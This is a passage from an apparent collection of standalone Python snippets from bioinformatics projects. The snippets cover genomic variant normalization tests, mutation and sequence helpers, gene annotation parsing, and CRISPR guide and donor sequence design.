grch38_braf_genom_sub,\n \"7-140453136-A-T\")\n\n resp = await test_handler.normalize(\"7-140753336-A-T\") # 38\n assert resp.variation_descriptor.id == \"normalize.variation:7-140753336-A-T\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, grch38_braf_genom_sub,\n \"7-140753336-A-T\")\n\n resp = await test_handler.normalize(\"BRAF V600E (g.140453136A>T)\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20V600E%20%28g.140453136A%3ET%29\" # noqa: E501\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF V600E (g.140453136A>T)\")\n\n resp = await test_handler.normalize(\"BRAF g.140453136A>T\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20g.140453136A%3ET\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF g.140453136A>T\")\n\n # More than 1 gene (EGFR and EGFR-AS1)\n resp = await test_handler.normalize(\"NC_000007.13:g.55249071C>T\")\n assertion_checks(resp.variation_descriptor, genomic_sub_grch38,\n \"NC_000007.13:g.55249071C>T\")\n\n resp = await test_handler.normalize(\"EGFR g.55249071C>T\")\n assert resp.variation_descriptor.id == \"normalize.variation:EGFR%20g.55249071C%3ET\"\n resp.variation_descriptor.id = \"normalize.variation:NC_000007.13%3Ag.55249071C%3ET\"\n assertion_checks(resp.variation_descriptor, genomic_substitution,\n \"EGFR g.55249071C>T\")", "def generate_mutString(s):\r\n test_seq = Seq.MutableSeq(str(template))\r\n #Introduce the mutation in a test string\r\n for mut in s.split():\r\n pos = int(mut[1:-1]) - 1 #Numbering from 0 in strings \r\n old = mut[0]\r\n new = mut[-1]\r\n if old == test_seq[pos]:\r\n test_seq[pos] = new \r\n else:\r\n print('Initial mutation didnt match')\r\n \r\n return test_seq", "def get_seq(self, table=1, cds=True):\n dna_seq = '' \n for exon in self.transcript.exons: \n dna_seq += self.transcript.rna.gene.polymer.get_subseq(\n start=max(self.coding_region.start, exon.start), \n end=min(self.coding_region.end, exon.end))\n \n if self.transcript.rna.gene.strand == core.PolymerStrand.negative:\n dna_seq = dna_seq.reverse_complement()\n \n return dna_seq.transcribe().translate(table=table, cds=cds)", "def mutate_seq(genome):\n for var in genome.get_variants():\n if var.type == \"snp\":\n mutate_snp(genome, var)\n elif var.type == \"indel\":\n mutate_indel(genome, var)\n elif var.type == \"deletion\":\n mutate_deletion(genome, var)\n elif var.type == \"translocation origin\":\n mutate_trans_orig(genome, var)\n elif var.type == \"translocation insert\":\n mutate_trans_ins(genome, var)", "def get_seq(self):\n dna_seq = ''\n\n for exon in self.exons: \n dna_seq += self.rna.gene.polymer.get_subseq(\n start=exon.start, end=exon.end)\n\n if self.rna.gene.strand==core.PolymerStrand.negative:\n dna_seq = dna_seq.reverse_complement() \n \n return dna_seq.transcribe()", "def protein_variant(variant):\n _validate_str(variant)\n if variant == WILD_TYPE_VARIANT:\n return WILD_TYPE_VARIANT\n elif variant == SYNONYMOUS_VARIANT:\n return SYNONYMOUS_VARIANT\n else:\n matches = re.findall(\"\\((p\\.\\S*)\\)\", variant)\n if len(matches) == 0:\n raise ValueError(\"Invalid coding variant string.\")\n # uniqify and remove synonymous\n seen = {\"p.=\": True}\n unique_matches = list()\n for v in matches:\n if v in seen:\n continue\n else:\n seen[v] = True\n unique_matches.append(v)\n if len(unique_matches) == 0:\n return SYNONYMOUS_VARIANT\n else:\n return \", \".join(unique_matches)", "def genomic_substitution(egfr_context):\n params = {\n \"id\": \"normalize.variation:NC_000007.13%3Ag.55249071C%3ET\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.VkcuqgqMuSQeq8Hy0VPOGRIeyr8uSBV2\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.VkcuqgqMuSQeq8Hy0VPOGRIeyr8uSBV2\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.G1gIZ-om-8Exl3F0ZLxXYY8CjliwCaO1\",\n \"interval\": {\n \"end\": {\"value\": 2630, \"type\": \"Number\"},\n \"start\": {\"value\": 2629, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.d_QsP29RWJi6bac7GOC9cJ9AO7s_HUMN\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"T\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"transcript\",\n \"structural_type\": \"SO:0001483\",\n \"vrs_ref_allele_seq\": \"C\",\n \"gene_context\": egfr_context\n }\n return VariationDescriptor(**params)", "def generate_variant_sequence(seq, variant, start=0, offset=0):\n ref, position, alt = extract_variant_info(variant)\n\n # make sure ref and alt have the same number of characters\n assert len(ref) == len(alt), \"Variants have different length.\"\n\n # calculate position relative to gene ref sequence instead of genome\n relative_start = position - start + offset - 1\n relative_end = relative_start + len(ref)\n\n # change the reference sequence to the alternate seq\n return seq[:relative_start] + alt + seq[relative_end:]", "def readMtVariant(variant_file, fam_excl = {}, pos_excl = {}):\n\tdata = {}\n\tn = 0\n\tif (variant_file == \"-\"):\n\t\t#use standard input instead\n\t\tfh = sys.stdin\n\telse:\n\t\tfh = open(variant_file)\n\thead = fh.readline()\n\thead = head.rstrip(\"\\r\\n\").split(\"\\t\")\n\tassert len(head) >= 27, \"Truncated head line of the variant file\"\n\tfor line in fh:\n\t\tline = line.rstrip(\"\\r\\n\").split(\"\\t\")\n\t\tfamily,sample,chr,pos,ref,depth,depth_fwd,depth_rev,allele,A,T,C,G,a,t,c,g,\\\n\t\theteroplasmy,substitution,het_allele,het_freq,het_freq_mle,het_freq_llr,het_low,het_high,het_p_fisher,het_p_sbias = line[:27]\n\t\tif (family in fam_excl):\n\t\t\t#exclude this family\n\t\t\tcontinue\n\t\tif (family == \"family\"):\n\t\t\t#skip the head line\n\t\t\tcontinue\n\t\t#a new variant\n\t\tvariant = MtVariant(family,sample,pos,ref,depth,depth_fwd,depth_rev,allele,het_allele,het_freq_mle,het_freq_llr,het_p_sbias)\n\t\t#temporarily store the original line\n\t\tvariant.line_cache = line[:]\n\t\tif (family not in data):\n\t\t\tdata[family] = {}\n\t\tif (sample not in data[family]):\n\t\t\tdata[family][sample] = {}\n\t\tpos = variant.pos\n\t\tassert pos not in data[family][sample], \"Duplicated vairant at position %d in sample %s.\" % (variant.pos, variant.sample)\n\t\tif (pos in pos_excl):\n\t\t\t#exclude this position\n\t\t\tcontinue\n\t\tdata[family][sample][pos] = variant\n\t\tn += 1\n\tprint \"Read %d mitochondrial DNA variants\" % n\n\treturn head, data", "def __getitem__(self, uuid: UUID) -> Mutant:\n return self.__mutants[uuid]", "def get_activating_subs(self):\n q_mods = prefixes + \"\"\"\n SELECT ?enzyme_name ?sub_label ?act_type ?rel ?stmt ?subject\n WHERE {\n ?stmt a belvoc:Statement .\n ?stmt belvoc:hasRelationship ?rel .\n ?stmt belvoc:hasSubject ?subject .\n ?stmt belvoc:hasObject ?object .\n ?subject a belvoc:ProteinAbundance .\n ?subject belvoc:hasConcept ?enzyme_name .\n ?subject belvoc:hasChild ?sub_expr .\n ?sub_expr rdfs:label ?sub_label .\n ?object a belvoc:AbundanceActivity .\n ?object belvoc:hasActivityType ?act_type .\n ?object belvoc:hasChild ?enzyme .\n ?enzyme a belvoc:ProteinAbundance .\n ?enzyme belvoc:hasConcept ?enzyme_name .\n }\n \"\"\"\n\n # Now make the PySB for the phosphorylation\n res_mods = self.g.query(q_mods)\n\n for stmt in res_mods:\n evidence = self._get_evidence(stmt[4])\n # Parse out the elements of the query\n enz = self._get_agent(stmt[0], stmt[5])\n sub_expr = term_from_uri(stmt[1])\n act_type = term_from_uri(stmt[2]).lower()\n # Parse the WT and substituted residues from the node label.\n # Strangely, the RDF for substituted residue doesn't break the\n # terms of the BEL expression down into their meaning, as happens\n # for modified protein abundances. Instead, the substitution\n # just comes back as a string, e.g., \"sub(V,600,E)\". This code\n # parses the arguments back out using a regular expression.\n match = re.match('sub\\(([A-Z]),([0-9]*),([A-Z])\\)', sub_expr)\n if match:\n matches = match.groups()\n wt_residue = matches[0]\n position = matches[1]\n sub_residue = matches[2]\n else:\n logger.warning(\"Could not parse substitution expression %s\" %\n sub_expr)\n continue\n mc = MutCondition(position, wt_residue, sub_residue)\n enz.mutations = [mc]\n rel = strip_statement(stmt[3])\n if rel == 'DirectlyDecreases':\n is_active = False\n else:\n is_active = True\n\n stmt_str = strip_statement(stmt[4])\n # Mark this as a converted statement\n self.converted_direct_stmts.append(stmt_str)\n st = ActiveForm(enz, act_type, is_active, evidence)\n self.statements.append(st)", "def subopt(sequences, energy_gap, ordering = None, material = 'rna',\n dangles = 'some', T = 37, multi = True, pseudo = False,\n sodium = 1.0, magnesium = 0.0, degenerate = False):\n \n ## Set up command-line arguments and input\n args, cmd_input = \\\n setup_nupack_input(exec_name = 'subopt', sequences = sequences, ordering = ordering,\n material = material, sodium = sodium, magnesium = magnesium,\n dangles = dangles, T = T, multi = multi, pseudo = pseudo)\n cmd_input += '\\n' + str(energy_gap)\n \n ## Perform call\n output = call_with_file(args, cmd_input, '.subopt')\n\n ## Parse and return output\n structs = []\n for i, l in enumerate(output):\n if l[0] == '.' or l[0] == '(':\n s = l.strip()\n e = output[i-1].strip()\n structs.append((s,e))\n \n return structs", "def __getitem__(self, idx):\n pos_pid = self.valid_passage_ids[idx]\n psg = self.passage_sent_dict[pos_pid]\n assert(len(psg) > 1)\n\n # randomly select a sentence as the question\n qid = random.choice(range(len(psg)))\n query = psg[qid]\n query_tokens = self.tokenizer.encode(query)\n\n # remove the selected sentence with 1 - sent_keep probability, this psg is the positive psg.\n sent_remove_flag = random.random() > self.sent_keep\n pos_psg = \" \".join(psg[:qid] + psg[qid+sent_remove_flag:])\n postive_psg_tokens = self.tokenizer.encode(pos_psg)\n\n # randomly sample from the rest to get negative samples.\n\n # extract a percentage of hard examples\n hard_k = int(self.sampled_softmax_n * self.hard_negative_rate)\n passage_set = self.passageids_set - set([pos_pid])\n hard_negatives = set([item for item in passage_set if item.split('.')[0] == pos_pid.split('.')[0]])\n\n # handle edge case for \n if len(hard_negatives) >= hard_k:\n npids_hard = random.sample(hard_negatives, k=hard_k)\n else:\n npids_hard = []\n hard_k = 0\n\n # extract a percentage of easy examples\n rest_k = self.sampled_softmax_n - hard_k\n npids_rest = random.sample(self.passageids_set - set([pos_pid]) - set(npids_hard), k=rest_k)\n\n # putting it all together\n npids = npids_hard + npids_rest\n negative_psg_tokens_list = [self.passage_dict[pid] for pid in npids]\n\n return query_tokens, postive_psg_tokens, negative_psg_tokens_list, pos_pid, npids", "def _variants_gen(self, test):\n return self._get_variants_gen(test).gen(test)", "def getMtVariant(data, depth_min = 10, depth_ratio_min = 0.0):\n\tvar = {}\n\tn = 0\n\tfor family in data:\n\t\tvar[family] = {}\n\t\tfor sample in data[family]:\n\t\t\tvar[family][sample] = {}\n\t\t\tfor variant in data[family][sample].values():\n\t\t\t\tif (variant.ref == \"N\"):\n\t\t\t\t\tcontinue\n\t\t\t\tif (variant.depth_qc >= depth_min and variant.depth_ratio >= depth_ratio_min):\n\t\t\t\t\tvar[family][sample][variant.pos] = variant\n\t\t\t\t\tn += 1\n\t\t\t\telse:\n\t\t\t\t\tvar[family][sample][variant.pos] = None\n\tprint \"Read %d mitochondrial DNA variants\" % n\n\treturn var", "def get_transcript_sgrnas(target_region_seq_df, context_len, pam_start, pam_len,\n sgrna_start, sgrna_len, pams, sg_positions):\n sgrna_df_list = []\n meta_columns = ['object_type', 'strand', 'transcript_id', 'seq_region_name', 'region_id', 'start', 'end']\n for i, row in target_region_seq_df.iterrows():\n seq_start = row['expanded_start']\n seq_end = row['expanded_end']\n sequence = row['seq']\n # Sequences on the positive strand\n pos_sgrna_df = tile.build_sgrna_df(sequence, context_len=context_len, pam_start=pam_start,\n pam_len=pam_len, sgrna_start=sgrna_start,\n sgrna_len=sgrna_len, pams=pams)\n pos_sgrna_df = get_sgrna_global_indices(pos_sgrna_df, seq_start, seq_end, 1, sg_positions)\n # assuming the target_region_seq_df is oriented on the positive sgRNA strand\n pos_sgrna_df['sgrna_strand'] = 1\n # Sequences on the negative strand\n rev_comp_seq = reverse_compliment(sequence)\n neg_sgrna_df = tile.build_sgrna_df(rev_comp_seq, context_len=context_len, pam_start=pam_start,\n pam_len=pam_len, sgrna_start=sgrna_start,\n sgrna_len=sgrna_len, pams=pams)\n neg_sgrna_df = get_sgrna_global_indices(neg_sgrna_df, seq_start, seq_end, -1, sg_positions)\n neg_sgrna_df['sgrna_strand'] = -1\n # Combine and filter sgrna_dfs\n sgrna_df = pd.concat([pos_sgrna_df, neg_sgrna_df])\n for col in meta_columns:\n sgrna_df[col] = row[col]\n sgrna_df_list.append(sgrna_df)\n concatenated_sgrna_dfs = (pd.concat(sgrna_df_list)\n .rename({'strand': 'transcript_strand',\n 'start': 'region_start',\n 'end': 'region_end',\n 'seq_region_name': 'chromosome'}, axis=1))\n return concatenated_sgrna_dfs", "def get_genes(variant):\n genes = {}\n transcripts = []\n mongo_genes = []\n \n # Conversion from ensembl to refseq\n # ensembl_to_refseq is a dictionary with ensembl transcript id as keys and\n # a list of refseq ids as values\n ensembl_to_refseq = {}\n for gene_info in variant['info_dict'].get(\n 'Ensembl_transcript_to_refseq_transcript', []):\n splitted_gene = gene_info.split(':')\n transcript_info = splitted_gene[1]\n for transcript in transcript_info.split('|'):\n splitted_transcript = transcript.split('>')\n if len(splitted_transcript) > 1:\n ensembl_id = splitted_transcript[0]\n refseq_ids = splitted_transcript[1].split('/')\n ensembl_to_refseq[ensembl_id] = refseq_ids\n \n # A dictionary with clinical gene descriptions\n gene_descriptions = {}\n for gene_info in variant['info_dict'].get('Gene_description', []):\n splitted_gene = gene_info.split(':')\n hgnc_symbol = splitted_gene[0]\n description = splitted_gene[1]\n gene_descriptions[hgnc_symbol] = description\n \n # First we get all vep entrys that we find and put them under their \n # corresponding gene symbol in 'genes'\n for vep_entry in variant['vep_info'].get(variant['ALT'], []):\n transcript = get_transcript(vep_entry, ensembl_to_refseq)\n hgnc_symbol = transcript.hgnc_symbol\n if hgnc_symbol:\n if hgnc_symbol in genes:\n genes[hgnc_symbol]['transcripts'][transcript.transcript_id] = transcript\n for functional_annotation in transcript.functional_annotations:\n new_rank = SO_TERMS[functional_annotation]['rank']\n if new_rank < genes[hgnc_symbol]['best_rank']:\n genes[hgnc_symbol]['best_rank'] = new_rank\n genes[hgnc_symbol]['most_severe_transcript'] = transcript\n genes[hgnc_symbol]['most_severe_function'] = functional_annotation\n \n else:\n genes[hgnc_symbol] = {}\n genes[hgnc_symbol]['transcripts'] = {}\n genes[hgnc_symbol]['transcripts'][transcript.transcript_id] = transcript\n genes[hgnc_symbol]['most_severe_transcript'] = transcript\n genes[hgnc_symbol]['omim_gene_id'] = None\n genes[hgnc_symbol]['phenotypic_terms'] = []\n genes[hgnc_symbol]['best_rank'] = 40\n genes[hgnc_symbol]['ensembl_id'] = transcript.ensembl_id\n \n for functional_annotation in transcript.functional_annotations:\n new_rank = SO_TERMS[functional_annotation]['rank']\n if new_rank < genes[hgnc_symbol]['best_rank']:\n genes[hgnc_symbol]['best_rank'] = new_rank\n genes[hgnc_symbol]['most_severe_function'] = functional_annotation\n \n \n ######################################################################\n ## There are two types of OMIM terms, one is the OMIM gene entry ##\n ## and one is for the phenotypic terms. ##\n ## Each key in the 'omim_terms' dictionary reprecents a gene id. ##\n ## Values are a dictionary with 'omim_gene_id' = omim_gene_id and ##\n ## 'phenotypic_terms' = [list of OmimPhenotypeObjects] ##\n ######################################################################\n\n # Fill the omim gene id:s:\n for annotation in variant['info_dict'].get('OMIM_morbid', []):\n if annotation:\n splitted_record = annotation.split(':')\n try:\n hgnc_symbol = splitted_record[0]\n omim_term = splitted_record[1]\n genes[hgnc_symbol]['omim_gene_id'] = omim_term\n except (ValueError, KeyError):\n pass\n\n # Fill the omim phenotype terms:\n for gene_annotation in variant['info_dict'].get('Phenotypic_disease_model', []):\n if gene_annotation:\n splitted_gene = gene_annotation.split(':')\n hgnc_symbol = splitted_gene[0]\n for omim_entry in splitted_gene[1].split('|'):\n splitted_record = omim_entry.split('>')\n \n phenotype_id = splitted_record[0]\n inheritance_patterns = []\n if len(splitted_record) > 1:\n inheritance_patterns = splitted_record[1].split('/')\n \n disease_model = PhenotypeTerm(\n phenotype_id=phenotype_id,\n disease_models=inheritance_patterns\n )\n \n genes[hgnc_symbol]['phenotypic_terms'].append(disease_model)\n \n for hgnc_symbol in genes:\n gene_info = genes[hgnc_symbol]\n most_severe = gene_info['most_severe_transcript']\n # Create a mongo engine gene object for each gene found in the variant\n mongo_gene = Gene(hgnc_symbol=hgnc_symbol)\n mongo_gene.description = gene_descriptions.get(hgnc_symbol)\n mongo_gene.ensembl_gene_id = gene_info.get('ensembl_id', None)\n mongo_gene.omim_gene_entry = gene_info.get(\n 'omim_gene_id', \n None\n )\n\n mongo_gene.omim_phenotypes = gene_info.get(\n 'phenotypic_terms', \n []\n )\n\n # Add a list with the transcripts:\n mongo_gene.transcripts = []\n for transcript_id in gene_info['transcripts']:\n mongo_gene.transcripts.append(gene_info['transcripts'][transcript_id])\n\n try:\n mongo_gene.functional_annotation = gene_info['most_severe_function']\n except AttributeError:\n pass\n try:\n mongo_gene.region_annotation = SO_TERMS[mongo_gene.functional_annotation]['region']\n except AttributeError:\n pass\n try:\n mongo_gene.sift_prediction = most_severe.sift_prediction\n except AttributeError:\n pass\n try:\n mongo_gene.polyphen_prediction = most_severe.polyphen_prediction\n except AttributeError:\n pass\n # Add the mongo engine gene to the dictionary\n mongo_genes.append(mongo_gene)\n\n return mongo_genes", "def __getitem__(self, index):\n # NOTE: this automatically supports slicing :-)\n return self._main._sequence[index]", "def test_mut_replace_terminal(self):\n ind1 = self.individuals[self.ind_strings[1]]\n self._test_mutation(ind1, mut_replace_terminal, self._mut_replace_terminal_is_applied)", "def get_genome_hgvs(genome_build, ref_seq, cdna_hgvs):\n query = \"{refseq}:{cdna}\".format(refseq=ref_seq, cdna=cdna_hgvs)\n url = \"https://mutalyzer.nl/services/?wsdl\"\n\n client = Client(url, cache=None)\n response = client.service.numberConversion(genome_build, query)\n find_hgvs = re.search(\"\\\".*\\\"\", str(response))\n if find_hgvs:\n genome_hgvs = find_hgvs.group(0)[1:-1]\n else:\n genome_hgvs = \"\"\n\n return genome_hgvs", "def get_variants_by_protein(self, _transcript_id):\n try:\n p = self.proteins[_transcript_id]\n var = []\n fs = []\n shift = 0\n for start_pos in self.proteinPos[_transcript_id]:\n for i in xrange(start_pos):\n for v in p.vars.get(i, []):\n if v.type in [VariationType.FSDEL, VariationType.FSINS]:\n shift = (v.get_shift()+shift) % 3\n if shift:\n fs.append(v)\n else:\n fs = []\n for j in xrange(start_pos, start_pos+len(self)):\n for v in p.vars.get(j, []):\n var.append(v)\n fs.extend(var)\n return fs\n except KeyError:\n raise ValueError(\"Peptide does not origin from protein with \"\n \"transcript ID {transcript}\".format(transcript=_transcript_id))", "def get_donor_mut_for_guide(self, guides_df, guide_id, donor_mut_type, num_donor_variants = 1,\n mut_pos_in_guide = None, donor_length=100,donor_seq_offset=0, set_name = \"\",\n min_dist_cut_to_donor_edge = 30, do_revcomp_donor = False,\n scramble_guide_and_donor = False):\n \n #print '++++++++++++++++++++++++++1'\n #print guides_df[guides_df['guide_id'] == guide_id]\n #print '++++++++++++++++++++++++++2'\n \n ################################\n # extracting guide details\n ################################\n \n # single row of the guide\n guides_df = guides_df[guides_df['guide_id'] == guide_id]\n\n guide_gene = str(guides_df['Gene'].iloc[0])\n guide_cut_chr_pos = int(guides_df['guide_cut_chr_pos'].iloc[0])\n guide0_chr_pos = int(guides_df['guide0_chr_pos'].iloc[0])\n guide_is_negative_strand = (guides_df['guide_strand'].iloc[0] == '-')\n \n guide_cut_gene_aa_pos = int(guides_df['guide_cut_gene_aa_pos'].iloc[0])\n guide_cut_gene_aa_frame = int(guides_df['guide_cut_gene_aa_frame'].iloc[0])\n \n \n # TODO currently only mut_pos_in_guide = None is implemented which uses the cut site position and frame\n if mut_pos_in_guide is not None and not np.isnan(mut_pos_in_guide):\n #raise ValueError(\"get_donor_mut_for_guide: only None (cut site) is implemented for mut_pos_in_guide:\" + str(mut_pos_in_guide))\n # should take gene and guide orientations into account\n \n \n mut_pos_in_guide = int(mut_pos_in_guide)\n \n #DEBUG\n #print 'mutation postion in guide %d' % (mut_pos_in_guide) \n \n cut_nt_pos_in_guide = -self.CRISPR_CUT_INDEX\n if (not self.is_neg_strand() and guide_is_negative_strand) or (self.is_neg_strand() and not guide_is_negative_strand):\n cut_nt_pos_in_guide = int(-self.CRISPR_CUT_INDEX - 1)\n \n #DEBUG\n #print \"cut pos in guide %d\" % (cut_nt_pos_in_guide)\n \n edit_pos2cut_gene_nt_diff = -mut_pos_in_guide + cut_nt_pos_in_guide\n edit_pos2cut_chr_pos_diff = -mut_pos_in_guide + cut_nt_pos_in_guide\n\n if (not self.is_neg_strand() and not guide_is_negative_strand) or (self.is_neg_strand() and guide_is_negative_strand):\n edit_pos2cut_gene_nt_diff = -edit_pos2cut_gene_nt_diff\n \n if (not guide_is_negative_strand):\n edit_pos2cut_chr_pos_diff = -edit_pos2cut_chr_pos_diff\n edit_chr_pos = guide0_chr_pos + mut_pos_in_guide\n else:\n edit_chr_pos = guide0_chr_pos - mut_pos_in_guide\n \n \n #DEBUG\n #print \"edit_pos2cut_gene_nt_diff %d\" % (edit_pos2cut_gene_nt_diff)\n #print \"edit_pos2cut_chr_pos_diff %d\" % (edit_pos2cut_chr_pos_diff)\n #print \"guide0_chr_pos %d \" % (guide0_chr_pos)\n #print \"guide_cut_chr_pos %d \" % (guide_cut_chr_pos)\n #print \"edit_chr_pos %d\" % (edit_chr_pos)\n \n \n edit_aa_pos = guide_cut_gene_aa_pos + np.floor((guide_cut_gene_aa_frame+edit_pos2cut_gene_nt_diff)/3) \n edit_aa_frame = np.remainder(guide_cut_gene_aa_frame+edit_pos2cut_gene_nt_diff,3)\n \n else:\n edit_chr_pos = guide_cut_chr_pos\n edit_aa_pos = guide_cut_gene_aa_pos\n edit_aa_frame = guide_cut_gene_aa_frame\n edit_pos2cut_chr_pos_diff = 0\n \n #DEBUG\n #print \"-----------mut in cut\"\n \n # parsing frameshift mutation type\n donor_mut_type_splt = donor_mut_type.split('_')\n donor_mut_name = donor_mut_type_splt[0]\n if (len(donor_mut_type_splt)>1):\n donor_mut_subtype = donor_mut_type_splt[1]\n if (len(donor_mut_type_splt)>2):\n if (donor_mut_name == 'frameshift'):\n donor_mut_len = int(donor_mut_type_splt[2])\n else:\n donor_mut_infoStr = donor_mut_type_splt[2]\n \n \n ######################################\n # allocating out dataframe\n ######################################\n out_guide_donor_df = pd.DataFrame(data=None)\n \n # flag of the donor strand (should match the guide so we first create the donor and then fix the orientation)\n is_donor_revcomp = False\n donor_seq = Seq(\"\", generic_dna)\n \n if (donor_mut_name == 'frameshift'):\n \n if (donor_mut_subtype == \"in\"): # insertion\n # num of nt to add left and right (-1 for the cut nucleotide, -donor_mut_len for the added nucleotide)\n donor_nt_add_left = int( np.floor((donor_length-donor_mut_len+edit_pos2cut_chr_pos_diff)/2) - donor_seq_offset)\n donor_nt_add_right = int((donor_length-1-donor_mut_len) - donor_nt_add_left)\n \n if (donor_nt_add_left < min_dist_cut_to_donor_edge or donor_nt_add_right < min_dist_cut_to_donor_edge):\n warnings.warn(\"Insert to big %d, there are not enough overlap with genome left: %d, right: %d - NOT returning \" % (donor_mut_len, donor_nt_add_left, donor_nt_add_right))\n else:\n \n # generate insertion sequences\n insert_seqs, insert_seqs_num_requested_ok = get_K_random_dna_nts(donor_mut_len,num_donor_variants)\n\n if not insert_seqs_num_requested_ok:\n warnings.warn(\"can not create that num_donor_variants: \" + str(num_donor_variants) + \" of DNA length donor_mut_len:\" + str(donor_mut_len))\n \n # DEBUG\n #print str(int(np.floor((donor_length-1-donor_mut_len)/2) + donor_seq_offset + edit_pos2cut_chr_pos_diff))\n \n #print edit_chr_pos\n #print type(edit_chr_pos)\n #print donor_nt_add_left\n #print type(donor_nt_add_left)\n #print donor_nt_add_right\n #print type(donor_nt_add_right)\n \n\n for idx,cur_insert_seq in enumerate(insert_seqs):\n # TODO ? make sure that does not create a stop codon? may be not because also cutting can create that\n if (self.is_neg_strand()):\n donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos+1)] + \\\n cur_insert_seq + \\\n self.genome_seq[self.chrom].seq[(edit_chr_pos+1): (edit_chr_pos + donor_nt_add_right + 1)]\n else:\n donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos)] + \\\n cur_insert_seq + \\\n self.genome_seq[self.chrom].seq[edit_chr_pos: (edit_chr_pos + donor_nt_add_right + 1)]\n \n # DEBUG\n #print cur_insert_seq\n #print donor_seq\n \n \n donor_info_str = \"in:\" + str(cur_insert_seq)\n \n \n # convert to match the guide orientation\n if (guide_is_negative_strand):\n donor_seq = donor_seq.reverse_complement()\n \n if do_revcomp_donor:\n donor_seq = donor_seq.reverse_complement()\n \n if scramble_guide_and_donor:\n donor_info_str = donor_info_str + \":\" + \"scramble\"\n tmp_donor_seq_lst = list(str(donor_seq))\n random.shuffle(tmp_donor_seq_lst)\n donor_seq = Seq(''.join(tmp_donor_seq_lst),alphabet=generic_dna)\n \n \n \n # appending to donor sequences matrix\n cur_donor_line = pd.DataFrame({'Gene' : guide_gene, 'guide_id' : pd.Series(guide_id), \n 'donor_id' : pd.Series(guide_id + ':' + donor_mut_type + ':offset' + str(donor_seq_offset) + ':donorID' + str(idx) + ':EditPosInGuide' + str(mut_pos_in_guide)), \n 'donor_seq': pd.Series(str(donor_seq)), \n 'donor_seq_shift' : pd.Series(int(donor_seq_offset)), \n 'donor_mut_pos_in_guide' : pd.Series(str(mut_pos_in_guide)), \n 'donor_info_str' : pd.Series( donor_info_str ),\n 'set_name' : pd.Series(str(set_name)) })\n \n out_guide_donor_df = out_guide_donor_df.append(cur_donor_line)\n \n elif (donor_mut_subtype == \"del\"): # deletion (currently only deletion after the cut (in term of the gene) are implemented)\n \n \n print \" ------ In del --------------\"\n \n if num_donor_variants != 1:\n raise ValueError(\"Currently a deletion can produce only a single varient: \" + str(num_donor_variants))\n else:\n idx = 0\n \n if (self.is_neg_strand()):\n left_side_deletion = int(np.floor(donor_mut_len/2))\n else:\n left_side_deletion = int(np.ceil(donor_mut_len/2))\n right_side_deletion = int(donor_mut_len - left_side_deletion)\n \n # num of nt to add left and right (-1 for the cut nucleotide, +donor_mut_len for the deleted nucleotide)\n donor_nt_add_left = int(np.floor(donor_length/2)) # + edit_pos2cut_chr_pos_diff + donor_seq_offset\n donor_nt_add_right = int(donor_length - donor_nt_add_left)\n \n cur_donor_offset = int(np.floor(edit_pos2cut_chr_pos_diff/2 + donor_seq_offset))\n \n \n #print \"donor_mut_len: %d\" % (donor_mut_len)\n #print \"right_side_deletion: %d\" % (right_side_deletion)\n #print \"donor_nt_add_left: %d\" % (donor_nt_add_left)\n #print \"donor_nt_add_right: %d\" % (donor_nt_add_right)\n #print \"edit_pos2cut_chr_pos_diff: %d\" % (edit_pos2cut_chr_pos_diff)\n #print \"donor_seq_offset: %d\" % (donor_seq_offset)\n #print \"cur_donor_offset: %d\" % (cur_donor_offset)\n \n # TODO ? make sure that does not create a stop codon? may be not because also cutting can create that\n # deleting downstream to the cut\n #if (self.is_neg_strand()):\n # donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos-donor_mut_len)] + \\\n # self.genome_seq[self.chrom].seq[(edit_chr_pos+1): (edit_chr_pos + donor_nt_add_right + 1)] \n \n #else:\n donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left-left_side_deletion+cur_donor_offset):(edit_chr_pos-left_side_deletion+1)] + \\\n self.genome_seq[self.chrom].seq[(edit_chr_pos+1+right_side_deletion): (edit_chr_pos + 1 + right_side_deletion + donor_nt_add_right + cur_donor_offset)]\n\n #if (self.is_neg_strand()):\n # donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos+1-donor_mut_len)] + \\\n # self.genome_seq[self.chrom].seq[(edit_chr_pos+1): (edit_chr_pos + donor_nt_add_right + 1)]\n #else:\n # donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos)] + \\\n # self.genome_seq[self.chrom].seq[(edit_chr_pos+donor_mut_len): (edit_chr_pos + donor_nt_add_right + 1)]\n \n #print str(self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left-left_side_deletion+cur_donor_offset+1):(edit_chr_pos-left_side_deletion+1)])\n #print str(self.genome_seq[self.chrom].seq[(edit_chr_pos+1+right_side_deletion): (edit_chr_pos + 1 + right_side_deletion + donor_nt_add_right + cur_donor_offset)])\n \n #print \"donor seq:\"\n #print str(donor_seq)\n\n\n\n # convert to match the guide orientation\n if (guide_is_negative_strand):\n donor_seq = donor_seq.reverse_complement()\n \n if do_revcomp_donor:\n donor_seq = donor_seq.reverse_complement()\n \n \n donor_info_str = \"del:\" + str(donor_mut_len)\n \n if scramble_guide_and_donor:\n donor_info_str = donor_info_str + \":\" + \"scramble\"\n tmp_donor_seq_lst = list(str(donor_seq))\n random.shuffle(tmp_donor_seq_lst)\n donor_seq = Seq(''.join(tmp_donor_seq_lst),alphabet=generic_dna)\n\n # appending to donor sequences matrix\n cur_donor_line = 